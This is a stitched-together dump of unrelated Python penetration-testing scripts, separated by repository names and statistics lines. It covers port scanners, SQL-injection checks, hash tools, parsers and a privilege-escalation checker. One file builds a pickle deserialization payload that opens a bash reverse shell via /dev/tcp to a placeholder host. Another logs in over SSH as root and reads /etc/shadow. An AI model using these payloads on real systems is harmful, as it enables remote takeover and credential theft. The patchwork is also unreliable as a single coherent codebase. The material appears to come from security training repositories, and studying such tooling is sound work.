elif "syntax error" in first.text.lower():
print "Injectable PostGRES detected"
elif "ora-" in first.text.lower():
print "Injectable Oracle detected"
else:
print "Not Injectable :( " | 27.823529 | 66 | 0.725971 |
owtf | """
owtf.utils.http
~~~~~~~~~~~~~~~
"""
import collections
import types
try: # PY3
from urllib.parse import urlparse
except ImportError: # PY2
from urlparse import urlparse
def derive_http_method(method, data):
"""Derives the HTTP method from Data, etc
:param method: Method to check
:type method: `str`
:param data: Data to check
:type data: `str`
:return: Method found
:rtype: `str`
"""
d_method = method
# Method not provided: Determine method from params
if d_method is None or d_method == "":
d_method = "GET"
if data != "" and data is not None:
d_method = "POST"
return d_method
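# Illustrative calls (not part of the original module):
#   derive_http_method(None, "user=admin")  -> "POST"
#   derive_http_method(None, "")            -> "GET"
#   derive_http_method("PUT", "payload")    -> "PUT"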
def deep_update(source, overrides):
"""Update a nested dictionary or similar mapping.
Modify ``source`` in place.
:type source: collections.Mapping
:type overrides: collections.Mapping
:rtype: collections.Mapping
"""
for key, value in overrides.items():
if isinstance(value, collections.Mapping) and value:
returned = deep_update(source.get(key, {}), value)
source[key] = returned
else:
source[key] = overrides[key]
return source
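# Illustrative call (not part of the original module):
#   deep_update({"a": {"b": 1}}, {"a": {"c": 2}})  ->  {"a": {"b": 1, "c": 2}}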
def extract_method(wrapped_method):
"""Gets original method if wrapped_method was decorated
:rtype: any([types.FunctionType, types.MethodType])
"""
# If method was decorated with validate, the original method
# is available as orig_func thanks to our container decorator
return wrapped_method.orig_func if hasattr(wrapped_method, "orig_func") else wrapped_method
def is_method(method):
method = extract_method(method)
# Can be either a method or a function
return type(method) in [types.MethodType, types.FunctionType]
| 25.621212 | 95 | 0.65205 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "XtremeWebAPP.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 22.272727 | 76 | 0.713725 |
Python-Penetration-Testing-for-Developers | import socket
host = "192.168.0.1"
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
s.listen(2)
while True:
conn, addr = s.accept()
print addr, "Now Connected"
conn.send("Thank you for connecting")
conn.close()
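# A matching client sketch (illustrative only, not part of the original listing):
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(("192.168.0.1", 12345))
#   print c.recv(1024)
#   c.close()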
| 20.25 | 53 | 0.700787 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
# from winbase.h
STDOUT = -11
STDERR = -12
try:
import ctypes
from ctypes import LibraryLoader
windll = LibraryLoader(ctypes.WinDLL)
from ctypes import wintypes
except (AttributeError, ImportError):
windll = None
SetConsoleTextAttribute = lambda *_: None
winapi_test = lambda *_: None
else:
from ctypes import byref, Structure, c_char, POINTER
COORD = wintypes._COORD
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", wintypes.WORD),
("srWindow", wintypes.SMALL_RECT),
("dwMaximumWindowSize", COORD),
]
def __str__(self):
return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
self.dwSize.Y, self.dwSize.X
, self.dwCursorPosition.Y, self.dwCursorPosition.X
, self.wAttributes
, self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
)
_GetStdHandle = windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [
wintypes.DWORD,
]
_GetStdHandle.restype = wintypes.HANDLE
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [
wintypes.HANDLE,
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
_SetConsoleTextAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
]
_SetConsoleTextAttribute.restype = wintypes.BOOL
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
_SetConsoleCursorPosition.argtypes = [
wintypes.HANDLE,
COORD,
]
_SetConsoleCursorPosition.restype = wintypes.BOOL
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
_FillConsoleOutputCharacterA.argtypes = [
wintypes.HANDLE,
c_char,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
_FillConsoleOutputAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputAttribute.restype = wintypes.BOOL
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
_SetConsoleTitleW.argtypes = [
wintypes.LPCSTR
]
_SetConsoleTitleW.restype = wintypes.BOOL
handles = {
STDOUT: _GetStdHandle(STDOUT),
STDERR: _GetStdHandle(STDERR),
}
def winapi_test():
handle = handles[STDOUT]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return bool(success)
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
handle = handles[stream_id]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return csbi
def SetConsoleTextAttribute(stream_id, attrs):
handle = handles[stream_id]
return _SetConsoleTextAttribute(handle, attrs)
def SetConsoleCursorPosition(stream_id, position, adjust=True):
position = COORD(*position)
# If the position is out of range, do nothing.
if position.Y <= 0 or position.X <= 0:
return
# Adjust for Windows' SetConsoleCursorPosition:
# 1. being 0-based, while ANSI is 1-based.
# 2. expecting (x,y), while ANSI uses (y,x).
adjusted_position = COORD(position.Y - 1, position.X - 1)
if adjust:
# Adjust for viewport's scroll position
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
adjusted_position.Y += sr.Top
adjusted_position.X += sr.Left
# Resume normal processing
handle = handles[stream_id]
return _SetConsoleCursorPosition(handle, adjusted_position)
def FillConsoleOutputCharacter(stream_id, char, length, start):
handle = handles[stream_id]
char = c_char(char.encode())
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
success = _FillConsoleOutputCharacterA(
handle, char, length, start, byref(num_written))
return num_written.value
def FillConsoleOutputAttribute(stream_id, attr, length, start):
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
handle = handles[stream_id]
attribute = wintypes.WORD(attr)
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
return _FillConsoleOutputAttribute(
handle, attribute, length, start, byref(num_written))
def SetConsoleTitle(title):
return _SetConsoleTitleW(title)
| 33.619355 | 111 | 0.644734 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
a=22
b=44
c=55
d=None
if 22:
print("This will be printed -> if 22:")
if "hello":
print("This will be printed -> if 'hello':")
if -1:
print("This will be printed -> if -1")
if 0:
print("This would not be printed")
if d:
    print("This will not be printed")
print("Lets Start with logical operators")
if a and b and c :
print("Printed -> if a and b and c:")
if a and b and c and d:
print("Not printed")
if a < b and a < c:
print("a is smaller than b and c -> without braces")
if (a < b) and (a <c) :
print("a is smaller than b and c -> with braces")
if a or b or c or d:
print("This is printed > if a or b or c or d :")
if not d:
    print("This is printed because not d is True (d is None)")
| 20.69697 | 54 | 0.632168 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
host = 'www.dvwa.co.uk'
ip = socket.gethostbyname(host)
openp = []
filterdp = []
common_ports = { 21, 22, 23, 25, 53, 69, 80, 88, 109, 110,
123, 137, 138, 139, 143, 156, 161, 389, 443,
445, 500, 546, 547, 587, 660, 995, 993, 2086,
2087, 2082, 2083, 3306, 8443, 10000
}
def is_up(ip):
icmp = IP(dst=ip)/ICMP()
resp = sr1(icmp, timeout=10)
if resp == None:
return False
else:
return True
def probe_port(ip, port, result = 1):
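    # Result codes used below: 1 = open|filtered (no reply), 0 = closed (RST/ACK seen),
    # 2 = filtered (ICMP type 3 with code 1, 2, 3, 9, 10 or 13).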
src_port = RandShort()
try:
p = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='F')
resp = sr1(p, timeout=2) # Sending packet
        if resp is None:
result = 1
elif resp.haslayer(TCP):
if resp.getlayer(TCP).flags == 0x14:
result = 0
elif (int(resp.getlayer(ICMP).type)==3 and int(resp.getlayer(ICMP).code) in [1,2,3,9,10,13]):
result = 2
except Exception as e:
pass
return result
if __name__ == '__main__':
conf.verb = 0
if is_up(ip):
for port in common_ports:
print (port)
response = probe_port(ip, port)
if response == 1:
openp.append(port)
elif response == 2:
filterdp.append(port)
if len(openp) != 0:
print ("Possible Open or Filtered Ports:")
print (openp)
if len(filterdp) != 0:
print ("Possible Filtered Ports:")
print (filterdp)
if (len(openp) == 0) and (len(filterdp) == 0):
print ("Sorry, No open ports found.!!")
else:
print ("Host is Down")
| 26.84127 | 105 | 0.499715 |
cybersecurity-penetration-testing |
'''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Python HashSearch for MPE+
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 April 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
import time # Basic Time Module
import logging # Script Logging
import hashlib # Python Hashing Module
from sys import argv # Command Line arguments
# Import 3rd Party Modules
# End of Script Module Importing
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: Hash Search for MPE+ "
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_LOG = "C:/SYN/HashSearch/FORENSIC_LOG.txt"
SRC_HASH = "C:/SYN/HashSearch/Hashes.txt"
CSV = "C:/SYN/HashSearch/results.csv"
# LOG Constants used as input to LogEvent Function
LOG_DEBUG = 0 # Debugging Event
LOG_INFO = 1 # Information Event
LOG_WARN = 2 # Warning Event
LOG_ERR = 3 # Error Event
LOG_CRIT = 4 # Critical Event
LOG_OVERWRITE = True # Set this constant to True if the SCRIPT_LOG
# should be overwritten, False if not
# End of Script Constants
# Initialize Forensic Logging
try:
# If LOG should be overwritten before
# each run, the remove the old log
if LOG_OVERWRITE:
# Verify that the log exists before removing
if os.path.exists(SCRIPT_LOG):
os.remove(SCRIPT_LOG)
# Initialize the Log include the Level and message
logging.basicConfig(filename=SCRIPT_LOG, format='%(levelname)s\t:%(message)s', level=logging.DEBUG)
except:
print ("Failed to initialize Logging")
quit()
# End of Forensic Log Initialization
# Initialize CSV Output File
# Write Heading Line
try:
csvOut = open(CSV, "w")
csvOut.write("FileName, MD5 Hash, Match, Category \n")
except:
print ("Failed to initialize CSV File .. Make sure file is not open")
quit()
# Script Functions
'''
If your script contains functions, insert them here,
before the main script executes. This ensures that
the functions are callable from anywhere in your script.
'''
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calculate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
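# Illustrative result (not part of the original script): GetTime() returns a tuple such as
# ('UTC Time: ', 'Mon Apr 18 14:03:07 2016')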
# Function: LogEvent()
#
# Logs the event message and specified type
# Input:
# eventType: LOG_INFO, LOG_WARN, LOG_ERR, LOG_CRIT or LOG_DEBUG
# eventMessage : string containing the message to be logged
def LogEvent(eventType, eventMessage):
if type(eventMessage) == str:
try:
timeStr = GetTime('UTC')
# Combine current Time with the eventMessage
# You can specify either 'UTC' or 'LOCAL'
# Based on the GetTime parameter
eventMessage = str(timeStr)+": "+eventMessage
if eventType == LOG_INFO:
logging.info(eventMessage)
elif eventType == LOG_DEBUG:
logging.debug(eventMessage)
elif eventType == LOG_WARN:
logging.warning(eventMessage)
elif eventType == LOG_ERR:
logging.error(eventMessage)
elif eventType == LOG_CRIT:
logging.critical(eventMessage)
else:
logging.info(eventMessage)
except:
logging.warn("Event messages must be strings")
else:
logging.warn('Received invalid event message')
# End LogEvent Function =========================
# Simple CSV Write Method
# Without Library Assist
def WriteCSV(fileName, MD5, match, category):
if match:
csvOut.write(fileName+","+MD5+","+ "*** YES ***"+","+category+"\n")
else:
csvOut.write(fileName+","+MD5+","+ " "+","+""+"\n")
# Main Script Starts Here
#
# Script Overview
#
# The purpose of this script is to provide an example
# script that demonstrates and leverages key capabilities
# of Python that provide direct value to the
# forensic investigator.
if __name__ == '__main__':
# Mark the starting time of the main loop
theStart = time.time()
LogEvent(LOG_INFO, SCRIPT_NAME)
LogEvent(LOG_INFO, SCRIPT_VERSION)
LogEvent(LOG_INFO, "Script Started")
# Print Basic Script Information
# For MPE+ Scripts the length of the argument vector is
# always 2 scriptName, path
if len(argv) == 2:
scriptName, path = argv
else:
        LogEvent(LOG_INFO, str(argv) + " Invalid Command line")
quit()
LogEvent(LOG_INFO,"Command Line Argument Vector")
LogEvent(LOG_INFO,"Script Name: " + scriptName)
LogEvent(LOG_INFO,"Script Path: " + path)
# Verify the path exists and determine
# the path type
LogEvent(LOG_INFO, "Processing Command Line")
if os.path.exists(path):
LogEvent(LOG_INFO,"Path Exists")
if os.path.isdir(path):
LogEvent(LOG_INFO,"Path is a directory")
else:
LogEvent(LOG_ERR, path + " is not a directory")
quit()
else:
LogEvent(LOG_ERR, path + " Does not exist")
quit()
LogEvent(LOG_INFO, "Reading Hash Values to Search from: "+SRC_HASH)
LogEvent(LOG_INFO, "Creating Dictionary of Hashes")
hashDict = {}
try:
with open(SRC_HASH) as srcHashes:
# for each line in the file extract the hash and id
# then store the result in a dictionary
# key, value pair
# in this case the hash is the key and id is the value
LogEvent(LOG_INFO, "Hashes included in Search")
LogEvent(LOG_INFO, "========== HASHES INCLUDED IN SEARCH ==========")
for eachLine in srcHashes:
if eachLine != "END":
lineList = eachLine.split()
if len(lineList) >= 2:
hashKey = lineList[0].upper()
hashValue = ""
for eachElement in lineList[1:]:
hashValue = hashValue + " " + str(eachElement)
# Strip the newline from the hashValue
hashValue = hashValue.strip()
# Add the key value pair to the dictionary
if hashKey not in hashDict:
hashDict[hashKey] = hashValue
LogEvent(LOG_INFO, hashKey+": "+hashValue)
else:
LogEvent(LOG_WARN, "Duplicate Hash Found: " + hashKey)
else:
# Not a valid entry, continue to next line
continue
else:
break
LogEvent(LOG_INFO, "========== END HASH SEARCH LIST ==========")
except:
LogEvent(LOG_ERR, "Failed to load Hash List: "+SRC_HASH)
LogEvent(LOG_INFO, "========== FILE SEARCH START ==========")
# Create Empty matchList and filesProcessed Count
matchList = []
filesProcessed = 0
# Now process all files in the directory provided
# Including all subdirectories
for root, subdirs, files in os.walk(path):
for curFile in files:
# Create the full pathName
fullPath = os.path.join(root, curFile)
# Generate the hash for the current file
# Default is to use MD5
hasher = hashlib.md5()
with open(fullPath, 'rb') as theTarget:
filesProcessed += 1
# Read the contents of the file and hash them
fileContents = theTarget.read()
hasher.update(fileContents)
# get the resulting hashdigest
hashDigest = hasher.hexdigest().upper()
# Now check for a hash match against the
# list we read in by checking the contents of the dictionary
if hashDigest in hashDict:
# If we find a match log the match and add the match to the matchList
matchDetails = hashDict[hashDigest]
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ curFile)
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ hashDigest)
                    LogEvent(LOG_CRIT, "    CATEGORY   >> "+ matchDetails)
# add entry to match list
matchList.append([curFile, hashDigest, matchDetails])
# add entry to the csv file
WriteCSV(curFile,hashDigest,True, matchDetails)
else:
# if no match simply log the file and associated hash value
LogEvent(LOG_INFO, "File >> " + curFile + " MD5 >> " + hashDigest)
# add entry to csv file
WriteCSV(curFile,hashDigest,False, "")
# All files are processed
# close the CSV File for good measure
csvOut.close()
# Post the end of file search to the log
LogEvent(LOG_INFO, "========== FILE SEARCH END ==========")
# Once we process all the files
# Log the contents of the match list
# at the end of the log file
# If any matches were found create a summary at
# the end of the log
if matchList:
LogEvent(LOG_INFO, "")
LogEvent(LOG_CRIT, "==== Matched Hash Summary Start ====")
for eachItem in matchList:
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ eachItem[0])
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ eachItem[1])
            LogEvent(LOG_CRIT, "    CATEGORY   >> "+ eachItem[2])
LogEvent(LOG_CRIT, "==== Matched Hash Summary End ====")
# Record the End Time and calculate the elapsed time
theEnd = time.time()
elapsedTime = theEnd - theStart
# Log the number of Files Processed
# and the elapsed time
LogEvent(LOG_INFO, 'Files Processed: ' + str(filesProcessed))
LogEvent(LOG_INFO, 'Elapsed Time: ' + str(elapsedTime) + ' seconds')
# Now print the contents of the forensic log
with open(SCRIPT_LOG, 'r') as logData:
for eachLine in logData:
print(eachLine)
| 32.848485 | 104 | 0.560964 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# Takes two files on input. Tries to find every line of the second file within the first file
# and for every found match - extracts password value from the second file's line. Then prints these correlations.
#
# In other words:
#
# FileA:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c
#
# FileB - result of running hashcat:
# 68eacb97d86f0c4621fa2b0e17cabd8c:Test123
#
# WILL RETURN:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
#
# Mariusz Banach / mgeeky
#
import sys, os
def main(argv):
if len(argv) < 3:
print('''
Usage: ./correlateCrackedHashes.py <fileWithUsernames> <crackedHashesFile> [delimiter]
<fileWithUsernames> - File containing usernames and their hashes (or just hashes)
<crackedHashesFile> - File being a result of running hashcat, in a form of hash:password
    [delimiter] - (optional) Delimiter used to join the matched username line with its cracked password
Default: comma
''')
return False
usernamesFile = argv[1]
crackedHashesFile = argv[2]
delimiter = ',' if len(argv) < 4 else argv[3]
if not os.path.isfile(usernamesFile):
        print(f'[!] Usernames file does not exist: "{usernamesFile}"')
return False
if not os.path.isfile(crackedHashesFile):
        print(f'[!] Cracked passwords file does not exist: "{crackedHashesFile}"')
return False
usernames = []
cracked = []
with open(usernamesFile) as f: usernames = [x.strip() for x in f.readlines()]
with open(crackedHashesFile) as f: cracked = [x.strip() for x in f.readlines()]
correlated = []
    for crackedPass in cracked:
        # split on the last colon so cracked passwords containing ':' stay intact
        posOfLastColon = crackedPass.rfind(':')
        hashValue = crackedPass[:posOfLastColon]
        password = crackedPass[posOfLastColon+1:]
        for user in usernames:
            if hashValue in user:
                print(delimiter.join([user, password]))
                correlated.append(delimiter.join([user, password]))
if __name__ == "__main__":
main(sys.argv) | 31.846154 | 114 | 0.64761 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from anonBrowser import *
ab = anonBrowser(proxies=[],\
    user_agents=[('User-agent','superSecretBrowser')])
for attempt in range(1, 5):
ab.anonymize()
print '[*] Fetching page'
response = ab.open('http://kittenwar.com')
for cookie in ab.cookie_jar:
print cookie
| 22.785714 | 52 | 0.63253 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pexpect
PROMPT = ['# ', '>>> ', '> ','\$ ']
def send_command(child, cmd):
child.sendline(cmd)
child.expect(PROMPT)
print child.before
def connect(user, host, password):
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh ' + user + '@' + host
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, ssh_newkey,\
'[P|p]assword:'])
if ret == 0:
print '[-] Error Connecting'
return
if ret == 1:
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT, \
'[P|p]assword:'])
if ret == 0:
print '[-] Error Connecting'
return
child.sendline(password)
child.expect(PROMPT)
return child
def main():
host = 'localhost'
user = 'root'
password = 'toor'
child = connect(user, host, password)
send_command(child, 'cat /etc/shadow | grep root')
if __name__ == '__main__':
main()
| 21.659574 | 63 | 0.528195 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalCrossSiteScripting")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.181818 | 75 | 0.784375 |
Tricks-Web-Penetration-Tester | import pickle
import os
from base64 import b64decode,b64encode
class malicious(object):
def __reduce__(self):
return (os.system, ("/bin/bash -c \"/bin/sh -i >& /dev/tcp/ip/port 0>&1\"",))
ok = malicious()
ok_serialized = pickle.dumps(ok)
print(b64encode(ok_serialized))
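
# Illustration only (hypothetical receiving side): deserialising the payload is
# what triggers __reduce__ and runs the embedded command, e.g.:
#
#   from base64 import b64decode
#   import pickle
#   pickle.loads(b64decode(received_payload))   # received_payload is hypothetical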
| 22.75 | 85 | 0.672535 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
    if not scanner[host].hostname():
        print("The host's IP address is %s and its hostname was not found" % (host))
    else:
        print("The host's IP address is %s and its hostname is %s" % (host, scanner[host].hostname()))
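
# Example invocation (hypothetical script name, targets and ports):
#   python nmap_scanner.py 192.168.195.0/24 21,22,80,443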
| 42.627451 | 111 | 0.764838 |
cybersecurity-penetration-testing | # Transposition Cipher Test
# http://inventwithpython.com/hacking (BSD Licensed)
import random, sys, transpositionEncrypt, transpositionDecrypt
def main():
random.seed(42) # set the random "seed" to a static value
for i in range(20): # run 20 tests
# Generate random messages to test.
# The message will have a random length:
message = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' * random.randint(4, 40)
# Convert the message string to a list to shuffle it.
message = list(message)
random.shuffle(message)
message = ''.join(message) # convert list to string
print('Test #%s: "%s..."' % (i+1, message[:50]))
# Check all possible keys for each message.
for key in range(1, len(message)):
encrypted = transpositionEncrypt.encryptMessage(key, message)
decrypted = transpositionDecrypt.decryptMessage(key, encrypted)
# If the decryption doesn't match the original message, display
# an error message and quit.
if message != decrypted:
print('Mismatch with key %s and message %s.' % (key, message))
print(decrypted)
sys.exit()
print('Transposition cipher test passed.')
# If transpositionTest.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 34.8 | 79 | 0.611461 |
Hands-On-Penetration-Testing-with-Python | from tweet_parser.tweet import Tweet
from tweet_parser.tweet_parser_errors import NotATweetError
import fileinput
import json
import sys
class twitter_parser:
def __init__(self,file_name):
self.file=file_name
def parse(self):
for line in fileinput.FileInput(self.file):
try:
tweet_dict = json.loads(line)
tweet = Tweet(tweet_dict)
except Exception as ex:
                # skip lines that cannot be parsed as tweets
                continue
            print(tweet.all_text)
obj=twitter_parser(sys.argv[1])
obj.parse()
#"exp.json"
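# Example invocation (hypothetical script/file names; expects one JSON tweet per line):
#   python twitter_parser.py exp.json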
| 19.391304 | 59 | 0.726496 |
GWT-Penetration-Testing-Toolset | # -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
GwtParse v0.2
Copyright (C) 2010 Ron Gutierrez
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
from optparse import OptionParser
from GWTParser import GWTParser
desc = "A tool for parsing GWT RPC Requests"
if __name__ == "__main__":
parser = OptionParser(usage='usage: %prog [options]', description=desc, version='%prog 0.10')
    parser.add_option('-p', '--pretty', help="Output the GWT RPC Request in a human readable format", action="store_true")
parser.add_option('-s', '--surround', help="String used to surround all fuzzable values", action="store", dest="surround_value")
parser.add_option('-r', '--replace', help="String used to replace all fuzzable values", action="store", dest="replace_value")
parser.add_option('-b', '--burp', help="Generates Burp Intruder Output", default=False, action="store_true")
parser.add_option('-i', '--input', help="RPC Request Payload (Required)", action="store", dest="rpc_request")
parser.add_option('-w', '--write', help="Writes Fuzz String to a new output file", action="store" )
parser.add_option('-a', '--append', help="Appends Fuzz String to an existing output file", action="store" )
(options, args) = parser.parse_args()
if options.rpc_request:
if options.surround_value and options.replace_value and options.burp:
            print( "\nCannot choose more than one output format.\n" )
parser.print_help()
exit()
if options.surround_value and options.replace_value:
            print( "\nCannot choose more than one output format.\n" )
parser.print_help()
exit()
if options.surround_value and options.burp:
            print( "\nCannot choose more than one output format.\n" )
parser.print_help()
exit()
if options.replace_value and options.burp:
            print( "\nCannot choose more than one output format.\n" )
parser.print_help()
exit()
gwt = GWTParser()
if options.surround_value:
gwt.surround_value = options.surround_value
elif options.replace_value:
gwt.replace_value = options.replace_value
elif options.burp:
gwt.burp = options.burp
if options.write:
if os.path.exists(options.write):
print( "Output file entered already exists" )
exit()
fout = open( options.write, "w" )
gwt.fout = fout
elif options.append:
fout = open( options.append, "a" )
gwt.fout = fout
gwt.deserialize( options.rpc_request )
if options.pretty:
gwt.display()
gwt.get_fuzzstr()
if gwt.fout:
gwt.fout.close()
else:
print( "\nMissing RPC Request Payload\n" )
parser.print_help()
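    # Example invocation (hypothetical script name; -i takes the raw GWT-RPC request
    # payload, -p pretty-prints it and -b generates Burp Intruder output):
    #   python gwtparse.py -p -b -i "<captured GWT-RPC request payload>"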
| 35.864078 | 133 | 0.582982 |
Penetration-Testing-Study-Notes | #!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
